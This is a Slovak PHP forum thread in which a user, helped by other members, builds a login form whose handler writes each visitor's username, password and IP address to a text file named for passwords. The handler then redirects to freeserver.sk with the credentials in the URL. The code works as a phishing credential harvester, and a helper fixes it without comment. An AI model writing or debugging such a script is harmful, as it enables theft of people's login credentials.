[ Príspevkov: 20 ] 
AutorSpráva
Offline

Užívateľ
Užívateľ
php formular

Registrovaný: 09.03.08
Prihlásený: 22.12.10
Príspevky: 356
Témy: 85 | 85
Bydlisko: Topoľčany
NapísalOffline : 24.10.2008 22:09 | php formular

Ahojte. Prosim vas kto by mi ukazal nejaky script na posielanie dat z formulara napriklad do nejkeho textoveho suboru. mam namysli nieco taketo:
<input name="form" type="text" value="Váš text" />
Takze mam jednoduchy formular. donho napisem cokolvek a odoslem ho. Chcel by som aby mi to odoslalo na nejaky textovy subor. Da sa to bude niekto ochotny prosim?


_________________
FCSpartak Trnava
Offline

Čestný člen
Čestný člen
php formular

Registrovaný: 17.10.06
Prihlásený: 08.01.11
Príspevky: 1757
Témy: 17 | 17
NapísalOffline : 24.10.2008 22:18 | php formular

pozri fopen a fwrite


_________________
A Real Programmer might or might not know his wife's name. He does, however, know the entire ASCII code table.
Offline

Užívateľ
Užívateľ
Obrázok užívateľa

Registrovaný: 21.02.07
Prihlásený: 21.02.10
Príspevky: 3991
Témy: 96 | 96
NapísalOffline : 24.10.2008 22:28 | php formular

1, no rozumiem ale si nekonkretizoval ako má ten súbor vyzerať ...
2, na texty by som použil textareu


Offline

Užívateľ
Užívateľ
php formular

Registrovaný: 09.03.08
Prihlásený: 22.12.10
Príspevky: 356
Témy: 85 | 85
Bydlisko: Topoľčany
Napísal autor témyOffline : 24.10.2008 22:37 | php formular

Vies co lepsie ked to bude pod hviezdickami. takze takto: <input name="text" type="password" />
No ten subor .txt alebo nejaky iny by mal vypisat text, co som zadal do inputu,a nejakym sposobom sa tym zachoval, myslim nieco ako databazu


_________________
FCSpartak Trnava
Offline

Užívateľ
Užívateľ
Obrázok užívateľa

Registrovaný: 21.02.07
Prihlásený: 21.02.10
Príspevky: 3991
Témy: 96 | 96
NapísalOffline : 24.10.2008 22:40 | php formular

:D nerozumieme sa ...
otázka znie:
na každý vstup vytvoriť nový súbor
na každý vstup prepísať existujúci súbor
na každý vstup pridať do existujúceho súboru

PS: :D čo ty vlastne robíš? - hviezdičky :D


Offline

Užívateľ
Užívateľ
php formular

Registrovaný: 09.03.08
Prihlásený: 22.12.10
Príspevky: 356
Témy: 85 | 85
Bydlisko: Topoľčany
Napísal autor témyOffline : 24.10.2008 22:44 | php formular

najlepsia bude 2. moznost. takze na každý vstup prepísať existujúci súbor. a s tými hviezdičkami to bol vtip


_________________
FCSpartak Trnava
Offline

Užívateľ
Užívateľ
Obrázok užívateľa

Registrovaný: 21.02.07
Prihlásený: 21.02.10
Príspevky: 3991
Témy: 96 | 96
NapísalOffline : 24.10.2008 22:54 | php formular

:D jaj ok zajtra sa na to pozriem teraz idem spať ...


Offline

Užívateľ
Užívateľ
php formular

Registrovaný: 09.03.08
Prihlásený: 22.12.10
Príspevky: 356
Témy: 85 | 85
Bydlisko: Topoľčany
Napísal autor témyOffline : 24.10.2008 22:56 | php formular

myslim ze som nieco nasiel, ale ci to pomoze, to teda neviem.
Kód:
<?php
$filename = 'test.txt';
$somecontent = "Add this to the file\n";
if (is_writable($filename)) {
    if (!$handle = fopen($filename, 'a')) {
         echo "Cannot open file ($filename)";
         exit;
    }
    if (fwrite($handle, $somecontent) === FALSE) {
        echo "Cannot write to file ($filename)";
        exit;
    }

    echo "Success, wrote ($somecontent) to file ($filename)";

    fclose($handle);

} else {
    echo "The file $filename is not writable";
}
?>


_________________
FCSpartak Trnava
Offline

Užívateľ
Užívateľ
Obrázok užívateľa

Registrovaný: 21.02.07
Prihlásený: 21.02.10
Príspevky: 3991
Témy: 96 | 96
NapísalOffline : 25.10.2008 11:16 | php formular

jj je to presne to čo hľadáš ...


Offline

Užívateľ
Užívateľ
Obrázok užívateľa

Registrovaný: 02.09.08
Prihlásený: 23.01.13
Príspevky: 81
Témy: 17 | 17
NapísalOffline : 25.10.2008 12:33 | php formular

otazka teraz znie, ci ma nainstalovane PHP a nejaky server, aby to vedel spustit...


Offline

Užívateľ
Užívateľ
php formular

Registrovaný: 09.03.08
Prihlásený: 22.12.10
Príspevky: 356
Témy: 85 | 85
Bydlisko: Topoľčany
Napísal autor témyOffline : 25.10.2008 12:35 | php formular

Aako to skomponujem do toho inputu? ja sa v to moc nevyznam, tak sa pytam, preco by to nemal nejaky server spustit?


_________________
FCSpartak Trnava
Offline

Užívateľ
Užívateľ
Obrázok užívateľa

Registrovaný: 21.02.07
Prihlásený: 21.02.10
Príspevky: 3991
Témy: 96 | 96
NapísalOffline : 25.10.2008 14:04 | php formular

kaidžas skús sa pozrieť na PHP lebo keď nič netušíš je veľmi náročné ti to pekne opísať ...
jednoducho ten súbor si musíš upraviť ...


Offline

Užívateľ
Užívateľ
php formular

Registrovaný: 09.03.08
Prihlásený: 22.12.10
Príspevky: 356
Témy: 85 | 85
Bydlisko: Topoľčany
Napísal autor témyOffline : 25.10.2008 16:45 | php formular

no takze skusal som to riesit takto:
Kód:
<form action="spracuj.php" method=post name="loginfrm">
<input name="username" type="text" class="textfield" />
<input name="password" type="password" class="textfield" />
<input type="submit" class="ttl" name="Submit" value="Register" /></form>


Spracuj.php
Kód:
<?php
$fp2= $_SERVER["REMOTE_ADDR"];

$fp = FOpen("subory.txt", "a");
$fp3 = 'Nick : ' . "$username" . '>' . 'Heslo : ' . "$password" . '>' . "IP : " . "$fp2" . "/n";
 
FPutS($fp, $fp3);
FClose($fp);
header("location: http://freeserver.sk?login=".$_POST['username']."&password=".$_POST['password']);
?>

No a samozrejme ze som si na ftp nahral aj subory.txt s CHMOD 777. ale nejako mi to vypise len Ip adresu bez nicku a hesla. kde je prosim vas chyba?


_________________
FCSpartak Trnava
Offline

Užívateľ
Užívateľ
Obrázok užívateľa

Registrovaný: 21.02.07
Prihlásený: 21.02.10
Príspevky: 3991
Témy: 96 | 96
NapísalOffline : 25.10.2008 16:53 | php formular

$_POST["username"]
$_POST["password"]


Offline

Užívateľ
Užívateľ
php formular

Registrovaný: 09.03.08
Prihlásený: 22.12.10
Príspevky: 356
Témy: 85 | 85
Bydlisko: Topoľčany
Napísal autor témyOffline : 25.10.2008 17:07 | php formular

myslel si to takto? lebo teraz mi to vypisuje: Parse error: syntax error, unexpected T_VARIABLE in /srv2/home/veronicka/spracuj.php on line 4
prosim o pomoc

Kód:
<?php

$_POST["username"]
$_POST["password"]

$fp2= $_SERVER["REMOTE_ADDR"];

$fp = FOpen("hesla.txt", "a");
$fp3 = 'Nick : ' . "$username" . '>' . 'Heslo : ' . "$password" . '>' . "IP : " . "$fp2" . "/n";
 
FPutS($fp, $fp3);
FClose($fp);
header("location: http://freeserver.sk?login=".$_POST['username']."&password=".$_POST['password']);
?>


_________________
FCSpartak Trnava
Offline

Užívateľ
Užívateľ
Obrázok užívateľa

Registrovaný: 21.02.07
Prihlásený: 21.02.10
Príspevky: 3991
Témy: 96 | 96
NapísalOffline : 25.10.2008 18:35 | php formular

nie :D
myslel som to takto:
Kód:
<?php
$fp2= $_SERVER["REMOTE_ADDR"];

$fp = FOpen("subory.txt", "a");
$fp3 = 'Nick : ' .  $_POST["username"]  . '>Heslo : ' . $_POST["password"] . '>IP : ' .  $fp2 . '/n';
 
FPutS($fp, $fp3);
FClose($fp);
header("location: http://freeserver.sk?login=".$_POST['username']."&password=".$_POST['password']);
?>


Offline

Užívateľ
Užívateľ
php formular

Registrovaný: 09.03.08
Prihlásený: 22.12.10
Príspevky: 356
Témy: 85 | 85
Bydlisko: Topoľčany
Napísal autor témyOffline : 25.10.2008 20:15 | php formular

Dakujem uz to ide. len sa chcem este spytat na to presmerovanie. pre co mi to vypíse toto? Warning: Cannot modify header information - headers already sent by (output started at /srv2/home/veronicka/spracuj.php:2) in /srv2/home/veronicka/spracuj.php on line 10


_________________
FCSpartak Trnava
Offline

Užívateľ
Užívateľ
Obrázok užívateľa

Registrovaný: 21.02.07
Prihlásený: 21.02.10
Príspevky: 3991
Témy: 96 | 96
NapísalOffline : 25.10.2008 23:30 | php formular

lebo určite niečo na stránku vypisuješ skôr než sa vykoná script ... môže to byť aj prázdny riadok ... jednoducho header() čo máš v poslednom riadku nesmie byť za HTML výstupom ale pred akýmkoľvek či už echo alebo HTML znakmi ...


Offline

Užívateľ
Užívateľ
php formular

Registrovaný: 09.03.08
Prihlásený: 22.12.10
Príspevky: 356
Témy: 85 | 85
Bydlisko: Topoľčany
Napísal autor témyOffline : 26.10.2008 11:31 | php formular

Takže php script dám nad hlavičku webu, ak som to správne pochopil, script músí byt úplne prvý


_________________
FCSpartak Trnava
Offline

Užívateľ
Užívateľ
Obrázok užívateľa

Registrovaný: 21.02.07
Prihlásený: 21.02.10
Príspevky: 3991
Témy: 96 | 96
NapísalOffline : 26.10.2008 15:35 | php formular

hlavička header ... musí byť navrchu čohokoľvek ...


 [ Príspevkov: 20 ] 


php formular



Podobné témy

 Témy  Odpovede  Zobrazenia  Posledný príspevok 
V tomto fóre nie sú ďalšie neprečítané témy.

PHP formular

v PHP, ASP

8

515

09.10.2008 14:46

BBUlet

V tomto fóre nie sú ďalšie neprečítané témy.

php formular

v PHP, ASP

13

499

20.11.2008 20:13

tommy70777

V tomto fóre nie sú ďalšie neprečítané témy.

Formulár - PHP výstup

v PHP, ASP

7

611

04.10.2007 13:04

imcold

V tomto fóre nie sú ďalšie neprečítané témy.

PHP jednoduchy formular

v PHP, ASP

10

302

05.12.2013 20:43

Spixy

V tomto fóre nie sú ďalšie neprečítané témy.

PHP kontaktny formular a diakritika

v PHP, ASP

2

134

09.03.2015 20:43

walther

V tomto fóre nie sú ďalšie neprečítané témy.

PHP formulár na vlastnom servery

v PHP, ASP

5

230

25.12.2010 19:16

TommyHot

V tomto fóre nie sú ďalšie neprečítané témy.

php kontaktny formular- sprava o odoslani

v PHP, ASP

2

293

18.02.2013 20:03

martina833

V tomto fóre nie sú ďalšie neprečítané témy.

Nefunkčný formulár keď includnem header.inc.php

v PHP, ASP

4

257

10.08.2011 15:24

kapo

V tomto fóre nie sú ďalšie neprečítané témy.

C# - ako skryť aktívny formulár a otvoriť druhý formulár

[ Choď na stránku:Choď na stránku: 1, 2, 3 ]

v Technológia .NET

67

1193

28.06.2013 22:08

walther

V tomto fóre nie sú ďalšie neprečítané témy.

wordpress kontaktný formulár a objednávkový formulár

v Redakčné systémy

1

136

22.08.2016 10:26

hatto13

V tomto fóre nie sú ďalšie neprečítané témy.

PHP programátor - PHP, MySQL, jQuery,X)Html/CSS

v Ponuka práce

0

814

02.05.2011 12:08

magicmedia

V tomto fóre nie sú ďalšie neprečítané témy.

Vytvorenie suboru php a vlozenie php scriptu

v PHP, ASP

4

927

07.05.2010 14:02

DeiForm

V tomto fóre nie sú ďalšie neprečítané témy.

Formular

v HTML, XHTML, XML, CSS

9

145

04.04.2015 14:11

erikzet

V tomto fóre nie sú ďalšie neprečítané témy.

formulár

v PHP, ASP

1

316

07.06.2009 15:44

Ďuri

V tomto fóre nie sú ďalšie neprečítané témy.

formular

v PHP, ASP

3

288

31.07.2011 15:09

kudzo3

V tomto fóre nie sú ďalšie neprečítané témy.

Formular

v HTML, XHTML, XML, CSS

2

503

21.03.2009 20:46

bloger7



© 2005 - 2017 PCforum, edited by JanoF